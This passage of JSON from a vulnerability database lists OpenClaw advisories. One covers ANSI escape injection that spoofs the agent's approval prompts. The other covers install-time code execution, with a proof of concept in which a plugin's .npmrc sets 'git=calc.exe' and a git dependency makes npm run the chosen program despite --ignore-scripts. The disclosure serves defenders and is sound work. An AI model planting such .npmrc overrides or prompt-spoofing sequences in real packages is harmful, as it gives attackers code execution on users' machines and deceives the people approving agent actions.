            "summary": "OpenClaw has ACP CLI approval prompt ANSI escape sequence injection\n## Summary\n\nACP CLI approval prompt ANSI escape sequence injection\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Affected versions: `>= 2026.2.13, <= 2026.3.24`\n- First patched version: `2026.3.25`\n- Latest published npm version at verification time: `2026.3.24`\n\n## Details\n\nACP tool titles could previously carry ANSI control sequences into approval prompts and permission logs, letting untrusted tool metadata spoof terminal output. Commit `464e2c10a5edceb380d815adb6ff56e1a4c50f60` sanitizes tool titles at the source and broadens ANSI stripping to full CSI sequences.\n\nVerified vulnerable on tag `v2026.3.24` and fixed on `main` by commit `464e2c10a5edceb380d815adb6ff56e1a4c50f60`.\n\n## Fix Commit(s)\n\n- `464e2c10a5edceb380d815adb6ff56e1a4c50f60`",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35651",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00033",
                            "scoring_system": "epss",
                            "scoring_elements": "0.10281",
                            "published_at": "2026-06-05T12:55:00Z"
                        },
                        {
                            "value": "0.00033",
                            "scoring_system": "epss",
                            "scoring_elements": "0.10259",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00033",
                            "scoring_system": "epss",
                            "scoring_elements": "0.10301",
                            "published_at": "2026-06-06T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35651"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N"
                        },
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/464e2c10a5edceb380d815adb6ff56e1a4c50f60",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N"
                        },
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-14T14:29:21Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/464e2c10a5edceb380d815adb6ff56e1a4c50f60"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-4hmj-39m8-jwc7",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-14T14:29:21Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-4hmj-39m8-jwc7"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35651",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N"
                        },
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35651"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-ansi-escape-sequence-injection-in-approval-prompt",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N"
                        },
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-14T14:29:21Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-ansi-escape-sequence-injection-in-approval-prompt"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-4hmj-39m8-jwc7",
                    "reference_id": "GHSA-4hmj-39m8-jwc7",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-4hmj-39m8-jwc7"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109863?format=api",
                    "purl": "pkg:npm/openclaw@2026.3.28",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1j3m-fecr-f7cn"
                        },
                        {
                            "vulnerability": "VCID-1p5p-eth5-3ufu"
                        },
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-258k-a4dw-tfae"
                        },
                        {
                            "vulnerability": "VCID-26kp-dbu2-pqej"
                        },
                        {
                            "vulnerability": "VCID-26sg-e29u-hkf3"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-2uqu-k42d-1baq"
                        },
                        {
                            "vulnerability": "VCID-2wr9-h42m-a7ev"
                        },
                        {
                            "vulnerability": "VCID-356u-h788-pkgt"
                        },
                        {
                            "vulnerability": "VCID-38g8-39ek-xbat"
                        },
                        {
                            "vulnerability": "VCID-3wsw-d4z2-dydt"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-3zx4-t8cj-kbfn"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4hz5-f2pw-3yb4"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-5rgx-2krs-guck"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-733f-57ds-xugm"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7dyw-9b37-yqh4"
                        },
                        {
                            "vulnerability": "VCID-7ntr-5dr5-9uf8"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-7wmr-v7zb-6fc9"
                        },
                        {
                            "vulnerability": "VCID-7z2s-k6ty-ekg1"
                        },
                        {
                            "vulnerability": "VCID-96jd-x87b-s3ey"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-9xrt-mv81-3yc8"
                        },
                        {
                            "vulnerability": "VCID-a2wx-7b8h-c3h1"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-axp9-mt9z-gkgw"
                        },
                        {
                            "vulnerability": "VCID-b9w3-w2nq-cqg6"
                        },
                        {
                            "vulnerability": "VCID-bgwh-spue-yybk"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-c4yt-z48z-zygv"
                        },
                        {
                            "vulnerability": "VCID-c76v-4577-n7c6"
                        },
                        {
                            "vulnerability": "VCID-carm-gpgh-wbbf"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-cvmw-sxfq-dyhz"
                        },
                        {
                            "vulnerability": "VCID-d8v2-gft5-buee"
                        },
                        {
                            "vulnerability": "VCID-da47-zdf1-mfgf"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fekn-d6f3-xfa6"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-g3hg-peh1-tudm"
                        },
                        {
                            "vulnerability": "VCID-g8r6-x6s5-uydq"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hd4w-s3dp-nubj"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-j8fb-fhyc-33fu"
                        },
                        {
                            "vulnerability": "VCID-jdqk-kv8u-xqa9"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-kzgh-7f6h-kfd1"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mcz5-wgu1-z7g7"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p7me-4bzz-83cm"
                        },
                        {
                            "vulnerability": "VCID-p7v5-jqhq-nbhz"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-q6ne-sw1r-xkd1"
                        },
                        {
                            "vulnerability": "VCID-q9jf-srt4-fbcg"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-qjss-tvgk-3ubk"
                        },
                        {
                            "vulnerability": "VCID-r5bw-c2py-9udf"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-s3wz-3yzf-ybhz"
                        },
                        {
                            "vulnerability": "VCID-sja9-6t41-hud8"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-t991-75e7-ykdv"
                        },
                        {
                            "vulnerability": "VCID-una1-gxkk-t3bp"
                        },
                        {
                            "vulnerability": "VCID-uy97-p1ex-y7df"
                        },
                        {
                            "vulnerability": "VCID-v9cd-65tf-p3f8"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vktg-77tu-vycv"
                        },
                        {
                            "vulnerability": "VCID-vx5d-3d98-7kf3"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-w58d-6veg-uugy"
                        },
                        {
                            "vulnerability": "VCID-watb-49vx-yub1"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wx44-n3fr-skah"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-x4hn-ygbg-mkep"
                        },
                        {
                            "vulnerability": "VCID-x794-wfnf-1ugf"
                        },
                        {
                            "vulnerability": "VCID-x7uw-s9a6-fybd"
                        },
                        {
                            "vulnerability": "VCID-xfgw-ua7r-abbr"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xryt-a83q-q7et"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-xvhd-w4tv-tqhr"
                        },
                        {
                            "vulnerability": "VCID-xz8s-hj5s-wfgj"
                        },
                        {
                            "vulnerability": "VCID-xzg5-ren5-p7gw"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-y7sd-j9xn-qffs"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ykwt-tdpa-3bft"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-ynup-4v9e-tbh4"
                        },
                        {
                            "vulnerability": "VCID-yp2w-pc58-9bf6"
                        },
                        {
                            "vulnerability": "VCID-ywrn-52gx-f3ad"
                        },
                        {
                            "vulnerability": "VCID-z7wa-tw2t-vqas"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zb5t-hhkm-kfeh"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zkum-rn42-yyfs"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28"
                }
            ],
            "aliases": [
                "CVE-2026-35651",
                "GHSA-4hmj-39m8-jwc7"
            ],
            "risk_score": 3.1,
            "exploitability": "0.5",
            "weighted_severity": "6.2",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-bnfh-rsk9-cfea"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/90992?format=api",
            "vulnerability_id": "VCID-brfj-4shr-qkgc",
            "summary": "OpenClaw has an Arbitrary Malicious Code Execution Vulnerability\n> Fixed in OpenClaw 2026.3.24, the current shipping release.\n\n### Summary\nDuring the installation phase of OpenClaw local plugins/hooks, the Git executable can be hijacked by a project-level .npmrc file, leading to arbitrary code execution during installation.\n\n### Details\nPlease note that the source code locations mentioned below are based on version openclaw-2026.3.13-1, but the issue has been confirmed to still exist in the current latest version, 2026.3.23.\n\nWhen installing a local plugin directory, local plugin archive, local hook pack directory, or local hook pack archive, OpenClaw first copies the source directory to a temporary `stageDir`, then executes the following in that directory:\n\n```\nnpm install --omit=dev --silent --ignore-scripts\n```\n\nSee `src/infra/install-package-dir.ts:176-199`.\n\nSince this process does not strip the project root `.npmrc`, and npm reads the project-level `.npmrc` during local project installation, an attacker could use a `.npmrc` file in a malicious plugin or hook directory to override npm’s `git` executable path. By leveraging a Git dependency, the attacker could trigger npm to call this malicious program, thereby executing arbitrary local code during the installation phase.\n\n**Affected Paths**\n\n- Plugin CLI entry point: `src/cli/plugins-cli.ts:199-255`\n- Hook CLI entry point: `src/cli/hooks-cli.ts:573-676`\n- Plugin local directory / archive installation: `src/plugins/install.ts:379-405`, `src/plugins/install.ts:541-565`\n- Hook local directory / archive installation: `src/hooks/install.ts:380-403`, `src/hooks/install.ts:443-470`\n- Actual execution of `npm install --ignore-scripts`: `src/infra/install-package-dir.ts:176-199`\n\n**Vulnerability Trigger Flow**\n\n1. The user executes one of the following commands:\n\n   - `openclaw plugins install <path-or-spec>`\n   - `openclaw hooks install <path-or-spec>`\n2. 
If the argument is a local directory or local archive, OpenClaw navigates to the local installation path.\n3. OpenClaw copies the source directory to a temporary `stageDir`. See `src/infra/install-package-dir.ts:176-177`.\n4. If `dependencies` are present in `package.json`, OpenClaw executes the following in `stageDir`:\n\n```\nnpm install --omit=dev --silent --ignore-scripts\n```\n\nSee `src/infra/install-package-dir.ts:188-199`.\n\n5. npm reads the project-level `.npmrc` file in this directory.  Official documentation: [`.npmrc`](https://docs.npmjs.com/cli/v11/configuring-npm/npmrc/)\n6. If `.npmrc` is set to `git=<path to malicious program>` and there is a git dependency in the dependency tree, npm will invoke that `git` program when resolving the dependency.  Official documentation: [`npm config git`](https://docs.npmjs.com/cli/v11/using-npm/config/)  Git dependency documentation: [`package.json`](https://docs.npmjs.com/cli/v11/configuring-npm/package-json/)\n7. Consequently, an attacker can execute arbitrary local programs during the plugin/hook installation phase without waiting for the plugin or hook to be loaded later.\n\n**Triggering Commands**\n\n- Plugin installation command:\n\n```\nopenclaw plugins install <path-or-spec>\n```\n\n- Hook installation command:\n\n```\nopenclaw hooks install <path-or-spec>\n```\n\nWhen `<path-or-spec>` is a local directory or local archive, it will be resolved to the path used by the `npm install --omit=dev --silent --ignore-scripts` command mentioned above.\n\n### PoC\n\n\n\nCurrently, `testpoc/` is a minimal PoC directory used to verify that “when installing local packages, OpenClaw enters the `npm install --ignore-scripts` path.” It is divided into two core sections:\n\ntestpoc/pkg/\nPurpose: Simulates the local package directory installed by `openclaw plugins install ...` or `openclaw hooks install ...`\ntestpoc/repo/\nPurpose: Simulates a Git dependency repository within the npm dependency tree\nDirectory 
Structure\n\ntestpoc/\n├─ pkg/\n│  ├─ .npmrc\n│  ├─ package.json\n│  └─ sample-hook/\n│     ├─ HOOK.md\n│     └─ handler.js\n└─ repo/\n   ├─ package.json\n   └─ .git/...\nFunction of Each Component\n\ntestpoc/pkg/.npmrc\n\nCurrent content:\ngit=calc.exe\nFunction: Overrides npm’s Git executable configuration.\nMeaning: When npm encounters a git dependency during installation, it will not call the system git but will attempt to call the program specified here.\nThis is the core trigger point of this PoC. See testpoc/pkg/.npmrc:1\ntestpoc/pkg/package.json\n\nCurrently, this is a “mixed-use” manifest that includes both plugin and hook fields:\n{\n  “name”: “probe-host”,\n  “version”: “1.0.0”,\n  “private”: true,\n  “openclaw”: {\n    “extensions”: [“./dist/index.js”],\n    “hooks”: [“./sample-hook”]\n  },\n  “dependencies”: {\n    “probe-git-dep”: “git+file:///D:/AI Agent Source/OpenClaw/openclaw-2026.3.13-1/.testpoc/repo”\n  }\n}\nIts functionality is divided into three layers:\nopenclaw.extensions: Allows it to be validated as a plugin package\nopenclaw.hooks: Enables it to be validated as a hook package\nThe Git URL in dependencies: Forces npm to enter the Git dependency resolution path during installation\nSee testpoc/pkg/package.json:1\ntestpoc/pkg/sample-hook/HOOK.md\n\nPurpose: To meet the minimum metadata requirements for a hook package.\nThis is the key file that allows `openclaw hooks install pkg` to pass the pre-check. See testpoc/pkg/sample-hook/HOOK.md:1\ntestpoc/pkg/sample-hook/handler.js\n\nCurrent content:\nexport default async function handler() {\n  return { ok: true };\n}\nPurpose: Meets the requirement that the hook directory must contain a handler entry file.\nIt is not a usage point in itself; its sole purpose is to allow OpenClaw to proceed to the dependency installation phase. 
See testpoc/pkg/sample-hook/handler.js:1\ntestpoc/repo/package.json\n\nCurrent content:\n{“name”:“probe-git-dep”,‘version’:“1.0.0”}\nPurpose: Serves as the minimum repository content corresponding to a Git dependency.\nThe focus is not on the repository code itself, but on the fact that “it is a Git repository,” allowing npm to perform Git-related operations on it. See testpoc/repo/package.json:1\ntestpoc/repo/.git/\n\nPurpose: Makes testpoc/repo/ a real Git repository rather than a regular directory.\nWhen npm resolves the git+file://... dependency during installation, this is treated as the Git source.\nHow the current PoC works\n\nIf installing via hooks:\n\nopenclaw hooks install testpoc/pkg\nThe trigger chain is:\n\nOpenClaw identifies testpoc/pkg as the local hook package path\nIt passes pre-validation via openclaw.hooks, HOOK.md, and handler.js\nProceeds to src/infra/install-package-dir.ts:188-199\nExecutes:\nnpm install --omit=dev --silent --ignore-scripts\nnpm reads testpoc/pkg/.npmrc\nnpm processes the git dependency in package.json\nnpm attempts to call the program specified by git=calc.exe in .npmrc\n\n### Impact\nIt is best described as an installation-time local command execution / unsafe package-install configuration issue.\n\nMore precisely:\n\nOpenClaw installs local plugin and hook packs by running npm install --omit=dev --silent --ignore-scripts inside the staged package directory, see src/infra/install-package-dir.ts:188-199.\nIf that local package directory contains an attacker-controlled .npmrc, npm will still read it.\nIf .npmrc overrides npm’s git executable and the package has a git dependency, npm can invoke the attacker-chosen program during install.\n\nWho is impacted\n\nUsers who run:\n\nopenclaw plugins install <local path/archive>\nopenclaw hooks install <local path/archive>\n\nAnd who install a malicious or untrusted local package that includes:\n\na controlled .npmrc\na git dependency\na runnable attacker-controlled git target on that platform\n\nThis 
should be treated as a security issue, not just “malicious plugin behavior,” because the code execution happens during OpenClaw’s install workflow, before the plugin or hook is ever loaded as trusted runtime code.\n\nThe important distinction is:\n\nA normal “trusted plugin” case is: the operator installs a plugin, enables it, and later that plugin runs with plugin privileges.\nThis issue is different: OpenClaw’s installer executes npm install --omit=dev --silent --ignore-scripts inside an attacker-controlled package directory, and npm still honors attacker-controlled project config from .npmrc.\n\nThat means an untrusted local plugin or hook package can influence the package manager itself and reach arbitrary program execution at install time, via npm’s git setting and a git dependency, even though --ignore-scripts is present.\n\nWhy this matters from a security perspective:\n\nIt is install-time execution, not post-install trusted execution.\n\nThe execution is triggered by OpenClaw’s installer in src/infra/install-package-dir.ts:188-199.\n\nThis occurs before the package is accepted as a trusted loaded plugin/hook in the usual sense.\n\nIt defeats an expected safety boundary.\n\nThe code explicitly uses --ignore-scripts, which strongly suggests an intent to make installation safer.\n\nBut the installer still allows attacker-controlled package-manager configuration from .npmrc to affect execution.\n\nSo the current mitigation is incomplete in a security-relevant way.\n\nThe dangerous input is part of a supported user flow.\n\nOpenClaw explicitly supports installing plugins and hook packs from local directories and archives:\n\nsrc/cli/plugins-cli.ts:199-255\nsrc/cli/hooks-cli.ts:573-676\n\nThat makes “download a package/archive, then install it” a realistic operator action, not an artificial lab setup.\n\nThe issue is broader than plugin trust.\n\nThe problem is not “plugins can do bad things once trusted.”\n\nThe problem is “the installer consumes 
attacker-controlled package-manager config before trust is established.”\n\nThat is much closer to an unsafe install / supply-chain execution flaw than to ordinary trusted-plugin behavior.\n\nHooks are affected too.\n\nThe same installer path is used for hook packs, not only plugins.\n\nSo this is a shared install-surface issue, not an isolated plugin-runtime concern.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35641",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.0001",
                            "scoring_system": "epss",
                            "scoring_elements": "0.0119",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.0001",
                            "scoring_system": "epss",
                            "scoring_elements": "0.01189",
                            "published_at": "2026-06-06T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35641"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.6",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"
                        },
                        {
                            "value": "8.4",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-m3mh-3mpg-37hw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "8.6",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "8.4",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track*",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-14T14:30:45Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-m3mh-3mpg-37hw"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35641",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.6",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"
                        },
                        {
                            "value": "8.4",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35641"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-arbitrary-code-execution-via-npmrc-in-local-plugin-hook-installation",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.8",
                            "scoring_system": "cvssv3.1",
